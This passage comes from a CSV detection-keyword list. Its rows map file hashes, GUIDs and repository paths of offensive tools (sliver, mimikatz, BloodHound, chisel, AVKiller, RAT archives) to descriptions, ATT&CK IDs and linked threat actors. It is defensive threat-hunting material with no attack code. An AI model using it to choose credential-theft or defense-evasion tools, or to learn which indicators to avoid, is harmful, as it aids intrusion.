fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23001" "*1fc325f3-c548-43db-a13f-8c460dda8381*",".{0,1000}1fc325f3\-c548\-43db\-a13f\-8c460dda8381.{0,1000}","offensive_tool_keyword","DNS-Tunnel-Keylogger","Keylogging server and client that uses DNS tunneling/exfiltration to transmit keystrokes","T1056.001 - T1048.003","TA0009 - TA0011","N/A","N/A","Collection","https://github.com/Geeoon/DNS-Tunnel-Keylogger","1","0","#GUIDproject","N/A","9","3","273","40","2024-06-16T19:47:36Z","2024-01-10T17:25:58Z","23002" "*1fc722c8c40a50aaf248839f7da26ad37a11b67963cf37e94fefd262632ab6b2*",".{0,1000}1fc722c8c40a50aaf248839f7da26ad37a11b67963cf37e94fefd262632ab6b2.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23003" "*1fc97740da37d89c33dc2f6aef5840827cf0efc69519c320678494f369bac74c*",".{0,1000}1fc97740da37d89c33dc2f6aef5840827cf0efc69519c320678494f369bac74c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker 
- Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","23004" "*1fcdf70d9d7546a68df3ef27d3cb8eee7a125cb1a27de14ea8a2c3460275379d*",".{0,1000}1fcdf70d9d7546a68df3ef27d3cb8eee7a125cb1a27de14ea8a2c3460275379d.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","23005" "*1fd102be57f9c6c0b3a6fee86877d6eff1744782a71661f57afea9a895b5db38*",".{0,1000}1fd102be57f9c6c0b3a6fee86877d6eff1744782a71661f57afea9a895b5db38.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","23006" "*1fd778412efb89cb20d5602a216470af12f9acda80db2680ecd7c206cac208b0*",".{0,1000}1fd778412efb89cb20d5602a216470af12f9acda80db2680ecd7c206cac208b0.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","23008" "*1FDCAD33-E5D1-4D5F-ACD5-FA6F8661DFE5*",".{0,1000}1FDCAD33\-E5D1\-4D5F\-ACD5\-FA6F8661DFE5.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","#GUIDproject","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","23010" "*1fe92c614cbb39738a9726a5d970ac526f579b7e146c65ecd02cf6d4e7d563c1*",".{0,1000}1fe92c614cbb39738a9726a5d970ac526f579b7e146c65ecd02cf6d4e7d563c1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - 
T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","23014" "*1ff183ed7b15612ef77d444187d44d2e1d76df09fa1762c24c54ab45440c77b9*",".{0,1000}1ff183ed7b15612ef77d444187d44d2e1d76df09fa1762c24c54ab45440c77b9.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","23015" "*1ff4136cc59aec4f76d776abce00a592679490763f669a44eeead8f88c4a3c07*",".{0,1000}1ff4136cc59aec4f76d776abce00a592679490763f669a44eeead8f88c4a3c07.{0,1000}","offensive_tool_keyword","SharpClipboard","monitor the content of the clipboard continuously","T1115","TA0006 - TA0009","N/A","N/A","Credential Access","http://github.com/slyd0g/SharpClipboard","1","0","#filehash","N/A","8","1","N/A","N/A","N/A","N/A","23016" "*1ff55dc3672f99ad539c438efcaac7d6311afbe8b0dd8828d20e15c9b0d6e595*",".{0,1000}1ff55dc3672f99ad539c438efcaac7d6311afbe8b0dd8828d20e15c9b0d6e595.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23017" "*1ff88fe10eddeecf2f6d8c4e3fabf55a30f6572fc8b4df4b8117ff89b774a234*",".{0,1000}1ff88fe10eddeecf2f6d8c4e3fabf55a30f6572fc8b4df4b8117ff89b774a234.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","23019" "*1ffbdfc67132f41d9dee443ebdb65b7cade592378cb846467c32f8984df4ab9b*",".{0,1000}1ffbdfc67132f41d9dee443ebdb65b7cade592378cb846467c32f8984df4ab9b.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","0","#filehash","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","23020" "*1ffe0ceded7146d5b921b40dc941e4e1db10feb40e68dbd4919da143541b9614*",".{0,1000}1ffe0ceded7146d5b921b40dc941e4e1db10feb40e68dbd4919da143541b9614.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23021" "*1HeroYcNYMhjsq8RYCx1stSaRZnQd9B9Eq*",".{0,1000}1HeroYcNYMhjsq8RYCx1stSaRZnQd9B9Eq.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","0","#filehash","N/A","10","10","672","215","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z","23022" "*1kdnwbry2LyI7pyA*",".{0,1000}1kdnwbry2LyI7pyA.{0,1000}","offensive_tool_keyword","POC","CVE-2021-21972 POC exploitation","T1190 - T1059.001 - T1040","TA0001 - TA0003 - TA0009","N/A","Dispossessor","Exploitation tool","https://github.com/NS-Sp4ce/CVE-2021-21972","1","0","#content","N/A","7","5","491","146","2023-06-08T04:01:33Z","2021-02-24T11:14:58Z","23023" "*1mil-AD-passwords.txt*",".{0,1000}1mil\-AD\-passwords\.txt.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","23024" 
"*1N3/Sn1per*",".{0,1000}1N3\/Sn1per.{0,1000}","offensive_tool_keyword","Sn1per","Automated Pentest Recon Scanner.","T1083 - T1087 - T1518","TA0001 - TA0002 - TA0003","N/A","N/A","Discovery","https://github.com/1N3/Sn1per","1","0","N/A","N/A","N/A","10","8673","1917","2025-02-28T21:52:43Z","2015-09-06T15:47:38Z","23025" "*1N73LL1G3NC3x/Nightmangle*",".{0,1000}1N73LL1G3NC3x\/Nightmangle.{0,1000}","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","1","N/A","N/A","10","10","156","19","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z","23026" "*1njected/CMLoot*",".{0,1000}1njected\/CMLoot.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","1","N/A","N/A","8","2","175","22","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z","23027" "*1password2john.py*",".{0,1000}1password2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","23028" "*1rapid7-1_amd64.deb*",".{0,1000}1rapid7\-1_amd64\.deb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","1","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","23029" "*1y0n/AV_Evasion_Tool*",".{0,1000}1y0n\/AV_Evasion_Tool.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","1","N/A","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","23030" "*1y0n/AVKiller*",".{0,1000}1y0n\/AVKiller.{0,1000}","offensive_tool_keyword","AVKiller","forcibly close some anti-virus processes through process injection (taking 360 Security Guard and 360 Anti-Virus as examples)","T1055.011 - T1089","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/1y0n/AVKiller","1","1","N/A","N/A","10","2","127","18","2023-12-26T05:47:55Z","2023-12-19T00:55:23Z","23031" "*2_lyncbrute.sh*",".{0,1000}2_lyncbrute\.sh.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","8","4","337","63","2024-10-01T11:22:01Z","2016-05-20T04:32:41Z","23032" 
"*200db4742ae08044ebe53c1ccfd6db3c3cc97597a83c172f7a99aa2f0a60bd99*",".{0,1000}200db4742ae08044ebe53c1ccfd6db3c3cc97597a83c172f7a99aa2f0a60bd99.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","23034" "*2010807d09f45f949a2e24615d58a15d8914e09f9988aa8fd7c863c7e5434aa8*",".{0,1000}2010807d09f45f949a2e24615d58a15d8914e09f9988aa8fd7c863c7e5434aa8.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","#filehash","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","23035" "*2012e8f15dd0989f2b07b0471aa7162f04a9f1fbbee9e3dd0455b090aa8eb6c4*",".{0,1000}2012e8f15dd0989f2b07b0471aa7162f04a9f1fbbee9e3dd0455b090aa8eb6c4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23037" "*20144d177f7af4b900fddf4466327737bb72bf30c450a4e6a577f0efc6449647*",".{0,1000}20144d177f7af4b900fddf4466327737bb72bf30c450a4e6a577f0efc6449647.{0,1000}","offensive_tool_keyword","ROADtoken","Abusing Azure AD SSO with the Primary Refresh Token - ROADtoken is a tool that uses the BrowserCore.exe binary to obtain a cookie that can be used with SSO and Azure AD","T1557 - T1078 - T1071.001 - T1552.001","TA0006 ","N/A","N/A","Credential Access","https://github.com/dirkjanm/ROADtoken","1","0","#filehash","N/A","7","1","89","17","2020-09-30T16:18:47Z","2020-07-21T12:42:14Z","23038" "*2015-2022 www.sordum.org All Rights Reserved*",".{0,1000}2015\-2022\swww\.sordum\.org\sAll\sRights\sReserved.{0,1000}","offensive_tool_keyword","defender-control","disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://www.sordum.org/9480/defender-control-v2-1/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","23039" "*2016147045d2cbb478945f57bff4c5ce7ae8921c5b5cc996c76df9165b93c9d4*",".{0,1000}2016147045d2cbb478945f57bff4c5ce7ae8921c5b5cc996c76df9165b93c9d4.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - 
BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","23040" "*20185a48e061bc197cedc3f86910f51a97e9ab054c16b7dc2442a462d7222650*",".{0,1000}20185a48e061bc197cedc3f86910f51a97e9ab054c16b7dc2442a462d7222650.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","23041" "*2018bdc2964ffdea2e1e42f9bc8f5480b6203dac3bafc7eee958fb4d90d59139*",".{0,1000}2018bdc2964ffdea2e1e42f9bc8f5480b6203dac3bafc7eee958fb4d90d59139.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23042" "*2020host2021@tutanota.com*",".{0,1000}2020host2021\@tutanota\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","23043" 
"*2028fe2f9036b7fd8f192b6c9844acaa40bec1f40cead52c0ebc5defd9255f64*",".{0,1000}2028fe2f9036b7fd8f192b6c9844acaa40bec1f40cead52c0ebc5defd9255f64.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","23044" "*2033380cf345c3c743aefffe9e261457b23ececdb6ddd6ffe21436e6f71a8696*",".{0,1000}2033380cf345c3c743aefffe9e261457b23ececdb6ddd6ffe21436e6f71a8696.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","#filehash","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","23045" "*2037783e8898a2d75895b62f62e5c41c21fc8d63c8db0b31968964e8c3b10602*",".{0,1000}2037783e8898a2d75895b62f62e5c41c21fc8d63c8db0b31968964e8c3b10602.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23047" "*203a17d5f5b9b71578a530294b19056d7fefa2660883c1389fce89d536e93950*",".{0,1000}203a17d5f5b9b71578a530294b19056d7fefa2660883c1389fce89d536e93950.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 
- TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","23048" "*203e97f6f0cdd98944724e4899fbcd84ef5a84c85e1035ee303aaeb76756b95c*",".{0,1000}203e97f6f0cdd98944724e4899fbcd84ef5a84c85e1035ee303aaeb76756b95c.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23049" "*203f526ec99b89643cf5c7f59035791744cde64698f9d1f720670bc4dd327ebb*",".{0,1000}203f526ec99b89643cf5c7f59035791744cde64698f9d1f720670bc4dd327ebb.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23050" 
"*2042b3773e03285939fe7f0d0597a77c8d4958644b1d8a366cc71d384f1e5c30*",".{0,1000}2042b3773e03285939fe7f0d0597a77c8d4958644b1d8a366cc71d384f1e5c30.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","23051" "*204d4653cfb248966be343b46d2ed6c063a3717edb3fb3eca68269654437e65d*",".{0,1000}204d4653cfb248966be343b46d2ed6c063a3717edb3fb3eca68269654437e65d.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","23053" "*205557c0c8ffb366e94a954b35e848ea7e6ad72ed1f014e65a433288431f479c*",".{0,1000}205557c0c8ffb366e94a954b35e848ea7e6ad72ed1f014e65a433288431f479c.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","23055" "*205818e10c13d2e51b4c0196ca30111276ca1107fc8e25a0992fe67879eab964*",".{0,1000}205818e10c13d2e51b4c0196ca30111276ca1107fc8e25a0992fe67879eab964.{0,1000}","offensive_tool_keyword","rdpv","RemoteDesktopPassView is a small utility that reveals the 
password stored by Microsoft Remote Desktop Connection utility inside the .rdp files.","T1110 - T1560.001 - T1555.003 - T1212","TA0006 - TA0007","N/A","Phobos - GoGoogle - Kimsuky","Credential Access","https://www.nirsoft.net/utils/remote_desktop_password.html","1","0","#filehash","N/A","8","10","N/A","N/A","N/A","N/A","23057" "*20584fdcd4c51f0eb1ce998ff5f19f2f897100549a008657148e7677722398c7*",".{0,1000}20584fdcd4c51f0eb1ce998ff5f19f2f897100549a008657148e7677722398c7.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","23058" "*2058e248325daeca20f053bfeba403667aa6dd0b70b959963076ae8997c0cbe7*",".{0,1000}2058e248325daeca20f053bfeba403667aa6dd0b70b959963076ae8997c0cbe7.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","23059" "*205acf53b1ebc226645925788768bf52c0701d3227fedc7565cb803862cee602*",".{0,1000}205acf53b1ebc226645925788768bf52c0701d3227fedc7565cb803862cee602.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","23060" 
